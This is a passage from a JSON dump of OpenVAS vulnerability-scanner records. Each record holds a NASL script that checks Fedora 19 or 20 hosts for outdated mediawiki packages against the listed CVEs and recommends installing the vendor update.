"CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": 
"2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867776", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867776", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5691\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867776\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:10:21 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5691\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-5691\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132602.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T18:49:36", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5684", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310867788", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867788", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5684\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone 
Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867788\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:11:11 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5684\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-5684\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132655.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) 
announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:16", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-10-07T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-11727", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7199", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868360", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868360", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-11727\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868360\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-07 06:03:17 +0200 (Tue, 07 Oct 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-7199\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-11727\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11727\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140014.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.4~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:46", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-12-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-16033", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868575", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868575", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-16033\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868575\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-12 06:06:19 +0100 (Fri, 12 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-16033\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-16033\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145969.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.7~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:33", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-12-30T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-17228", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868642", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868642", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-17228\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868642\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-30 05:58:06 +0100 (Tue, 30 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-17228\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17228\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147173.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.8~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:32", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-10-07T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-11582", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7199", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868361", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868361", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-11582\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868361\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-07 06:03:40 +0200 (Tue, 07 Oct 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-7199\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-11582\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11582\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140008.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.4~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:21", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-10-15T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-12263", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868401", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868401", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-12263\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868401\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 06:02:42 +0200 (Wed, 15 Oct 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-12263\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12263\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140740.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.5~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:17", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-12-12T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-16020", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868570", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868570", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-16020\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868570\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-12 06:00:00 +0100 (Fri, 12 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-16020\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-16020\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145910.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.7~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:32", "description": "Check the version of mediawiki", "cvss3": {}, "published": "2014-10-15T00:00:00", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-12262", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868400", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-12262\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
